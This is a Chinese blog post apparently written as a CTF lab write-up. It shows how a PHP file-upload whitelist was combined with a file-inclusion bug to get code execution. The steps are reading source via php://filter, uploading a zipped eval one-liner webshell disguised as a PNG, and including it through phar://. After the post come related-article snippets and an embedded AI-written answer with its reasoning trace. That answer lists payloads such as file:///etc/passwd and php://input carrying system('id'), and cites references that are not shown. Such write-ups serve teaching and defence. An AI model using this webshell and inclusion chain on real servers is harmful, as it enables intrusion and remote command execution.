php文件上传+文件包含(phar伪协议)

最新推荐文章于 2025-04-03 20:33:30 发布
最新推荐文章于 2025-04-03 20:33:30 发布
阅读量6.3k 收藏 28
点赞数 6
分类专栏: CTF 文章标签: php upload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WFC1006848997/article/details/109968490
版权

test.bugku-web-upload—文件上传与文件包含组合

右键查看源码发现

在这里插入图片描述

继续查看源码,提示参数是file,还有一个upload.php

在这里插入图片描述

跟进upload.php,是个上传界面

在这里插入图片描述

那就可以猜测出是 文件上传与文件包含的组合,所以直接先使用伪协议查看源码,使用的是php://filter协议

php://filter/convert.base64-encode/resource=

首先读取include.php的源码

在这里插入图片描述

发现后缀多了一个.php,所以就不加.php了

在这里插入图片描述

base64解码

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    if(isset($file))
    {
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
            echo "<p> error! </p>";
        }
        else
        {
            include($file.'.php');
        }
    }
?>

发现,过滤了一些字符和协议,添加了 .php 的后缀

继续读取upload.php 看看其过滤了什么

<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }
}
?>

简单的审计,添加了白名单,只能上传 gif、jpg、png 格式的,但是没有对内容过滤,所以可以上传图片马,然后再将其包含即可,这里尝试使用了 zip: //,但是失败了,提示没有开启,但是我们还可以使用另一个协议 phar://zip: //协议差不多,都是可以访问zip格式压缩包内容,所以接下来我们就开始准备和上传我们的图片马

首先写一句话木马 shell.php

<?php @eval($_REQUEST['hack']);highlight_file(__FILE__);?>

在这里插入图片描述

然后将 shell.php 打包成 zip 文件

在这里插入图片描述

接着将shell.zip 更改为 shell.png,就是修改后缀名为png

在这里插入图片描述

然后将我们的图片马上传,成功上传

在这里插入图片描述

接着使用 phar:// 伪协议读取,没有报错且成功解析

include.php?file=phar://upload/shell.png/shell

在这里插入图片描述

这里需要注意,后面的 /shell 目录,一定要和图片名称一样(图片名称即刚刚zip文件里的php文件名),不然会报错,因为压缩包中没有 aaa.php 这个文件
在这里插入图片描述

成功包含解析,剩下的就是蚁剑连接或者直接执行命令即可

文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 7747
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
php伪协议 文件包含,文件包含漏洞(伪协议利用)
weixin_33166692的博客
03-30 1123
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
文件包含之——phar伪协议
abc18964814133的博客
05-09 8226
文件上传phar伪协议
WEB安全--文件上传漏洞--php伪协议的利用
最新发布
m0_74800552的博客
04-03 1362
PHP 中,通常指的是一种通过特定的 URL 协议方案实现某些特殊功能或行为的方式。伪协议通常并不是标准的协议(如 HTTP、HTTPS),而是由应用程序或开发者自定义的“伪”协议,用于执行某些特定任务。
phar文件包含实例:
weixin_53303754的博客
10-15 188
打开源码,得到有用的信息有lfi.phpupload.php、以及lfi.txt文件。打开lfi.txt文件,得到有用信息为%s.php,会给上传的目标文件添加php后缀。在html目录下,可进一步查看flag.phpupload.php。lfi.phpupload.php文件源码空空如也。使用phar伪协议进行文件包含。注意:链接末尾hack2无后缀。上传hack2.txt文件。
利用 phar 伪协议进行文件包含
m0_73612768的博客
11-03 541
在这里前后端都会校验,而且都采用白名单机制,并且 PHP 版本高于 5.2.4 ,什么 %00截断,0x00截断都用不了
zip和phar文件包含
L1ni01
12-06 2191
zip和phar文件包含 phar文件包含 phar协议要求:php大于5.3.0 需要将php.ini的参数phar.readonly设置为off 这个方法适用于验证包含文件为特定后缀时。 使用Phar://伪协议流可以Bypass一些上传的waf,大多数情况下和文件包含一起使用,就类似于我们的压缩包(其实就是一个压缩包),只不过我们换了一种方式去执行而已 本地测试: test.php <?php @eval($_POST["cmd"]);?> 然后将test.php压缩,将压缩文件改后缀为
php伪协议phar
woshicainiao666的博客
02-19 1526
php伪协议---phar
php伪协议读取目录,PHP文件包含,文件读取的利用思路,以及配合伪协议的trick...
weixin_31178795的博客
03-28 1430
PHP文件包含函数有两类,分三种:12file_get_contents()include()/include_once() require/require_once()第一种用于获取文件的数据,第二种用于包含并执行代码与读取文件两种功能php写文件的函数1file_put_contents()基本的思路就是用来写shell吧,不过会有各种限制,但是结合伪协议就可以简单绕过了file_get_...
文件包含漏洞-伪协议
weixin_53303754的博客
10-15 408
File://、php://filter、php://input、data://、http://、phar://、zip://
php文件包含 伪协议
m0_64361111的博客
02-28 1175
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()file_exists()filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
phar协议文件包含
fzy2003的博客
07-05 548
掌握phar协议文件包含的用法。
php归档格式:phar文件详解(创建、使用、解包还原提取)
m0_66964946的博客
02-01 835
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,使用php脚本就能创建或提取它。自那时起,人们做了大量工作来改善 Phar 归档的性能。
phar反序列化+文件上传与例题讲解
2301_79708753的博客
01-26 1677
web笔记相关于phar反序列化+文件上传与例题讲解,欢迎各位指正
文件包含技巧拓展】————2、zip或phar协议包含文件
Fly_鹏程万里
01-30 3392
这个方法适用于验证包含文件为特定后缀时。 例如以下代码 &lt;?php $file = $_GET['file']; if(isset($file) &amp;&amp; strtolower(substr($file, -4)) == ".jpg"){ include($file); } ?&gt; &lt;?php $file = $_GET['file']; include($fi...
利用zip(或者phar)协议进行本地文件包含
weixin_30907523的博客
04-14 549
$include_file=$_GET[include_file];if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" ){require( $include_file );} 1.php->phpinfo()->.zip->zip://xxx/xx...
PHPphar文件详解_phar文件格式_调用phar类方法生成phar文件
Ho1aAs‘s Blog
09-04 9284
phar简介 phar,全称为PHP Archive,phar扩展提供了一种将整个PHP应用程序放入.phar文件中的方法,以方便移动、安装。.phar文件的最大特点是将几个文件组合成一个文件的便捷方式,.phar文件提供了一种将完整的PHP程序分布在一个文件中并从该文件中运行的方法。 可以将phar文件类比为一个压缩文件 phar demo 注意:默认phar扩展是只读模式,需要手动配置php.ini中phar.readonly= Off 无法用ini_set修改 『踩坑记录』PHP-使用ini_set
phar php 应用,phar包在PHP中的应用
weixin_30915487的博客
03-12 136
phar包在PHP中的应用发布时间:2020-06-25 14:57:25来源:亿速云阅读:75作者:Leah本篇文章给大家分享的是有关phar包在PHP中的应用,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。首先需要修改php.ini配置将...
文件上传+文件包含组合式getshell
fzy2003的博客
07-05 825
掌握文件上传+文件包含组合式getshell。
文件包含伪协议
03-23
<think>好的,用户想了解文件包含伪协议的使用场景及安全风险。首先,我需要回顾一下PHP伪协议的基本概念,然后结合现有的引用资料来组织回答。 根据引用[2],PHP伪协议是支持的协议与封装协议,用于文件系统函数,比如fopen()file_exists()等。常见的有file://、php://、zip://等。使用场景可能包括文件包含、读取资源、数据流处理等。比如在CTF比赛中,选手可能会用这些协议绕过文件包含限制,引用[2]和[5]都提到了文件包含漏洞的应用。 安全风险方面,引用[1]提到伪协议存在安全隐患,特别是未经验证的用户输入可能导致文件泄露或代码执行。例如,如果允许用户控制文件路径,攻击者可能利用php://input执行恶意代码,或者用file://读取系统敏感文件。引用[4]提到的RFI(远程文件包含)也是一种风险,但需要allow_url_include开启,不过伪协议更多涉及本地文件包含。 需要具体说明使用场景,比如开发中的动态加载、数据流处理,以及漏洞利用场景。安全防护措施方面,引用[4]提到参数化白名单,限制允许的协议和路径,引用[1]建议输入验证和过滤。 还要注意引用资料的对应,比如引用[2]解释伪协议的原理,引用[5]提到文件包含的前提条件。可能需要分点回答,确保结构清晰,符合用户要求的中文回答,并且正确使用LaTeX格式,比如变量用$...$,独立公式用$$...$$,不过这里可能数学公式较少,但要注意变量如$_GET['file']的正确格式。 最后生成相关问题,可能需要围绕其他协议、具体漏洞案例、防御措施等展开。检查是否有遗漏的信息,比如不同协议的具体风险例子,如php://filter用于读取源码,zip://绕过文件上传限制等。确保回答覆盖用户需求,并正确引用资料。</think>### 文件包含伪协议的使用场景及安全风险 #### 一、使用场景 1. **动态资源加载** 在PHP开发中,文件包含伪协议(如`php://input`、`php://filter`)常用于动态读取文件内容或处理数据流。例如: ```php // 通过php://input获取POST原始数据 $data = file_get_contents('php://input'); ``` 这种场景适用于API开发或流式数据处理[^2]。 2. **文件包含功能** 伪协议可用于包含本地或远程文件,例如: ```php include($_GET['file']); // 用户可能传入phar://或zip://路径 ``` 在CTF比赛中,常用`php://filter`读取源码(如`php://filter/convert.base64-encode/resource=index.php`)[^5]。 3. **压缩包操作** 使用`zip://`协议直接访问压缩包内文件,无需解压: ```php $content = file_get_contents('zip://archive.zip#file.txt'); ``` #### 二、安全风险 1. **敏感文件泄露** 若未过滤用户输入,攻击者可通过`file://`协议读取系统文件: ```php include($_GET['file']); // 用户传入file:///etc/passwd ``` 导致敏感信息泄露[^5]。 2. **远程代码执行** 当`allow_url_include`开启时,攻击者可利用`php://input`注入恶意代码: ```php // 用户传入php://input,POST正文为<?php system('id'); ?> include($_GET['file']); ``` 从而执行任意命令[^4]。 3. **绕过文件限制** 使用`phar://`或`zip://`协议可绕过文件扩展名限制。例如上传图片马后,通过`phar://uploads/image.jpg/shell.php`解析其中的PHP代码。 #### 三、防御措施 1. **输入验证与白名单** 限制文件路径为固定范围,例如: ```php $allowed = ['page1.php', 'page2.php']; $file = $_GET['file']; if (!in_array($file, $allowed)) die("Invalid request"); ``` 此方法可有效避免非法协议调用[^4]。 2. **禁用危险配置** 在`php.ini`中关闭高风险选项: ```ini allow_url_include = Off allow_url_fopen = Off ``` 3. **过滤协议前缀** 对用户输入的协议进行检测和过滤: ```php $file = str_replace(['php://', 'file://'], '', $file); ``` 4. **最小权限原则** 确保Web服务器进程仅拥有必要文件的读取权限,避免越权访问[^1][^3]。 --- ### 相关问题 1. `php://filter`协议如何用于读取源码? 2. 如何通过`phar://`协议绕过文件上传限制? 3. 文件包含漏洞与远程代码执行(RCE)有何关联? 4. 防御文件包含攻击的最佳实践有哪些? [^1]: PHP伪协议的安全防护需结合输入验证与配置优化 : 伪协议在CTF中常用于文件包含和源码泄露 : 参数化白名单可有效控制文件包含风险 : 文件包含漏洞需满足目标存在且可读的条件
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值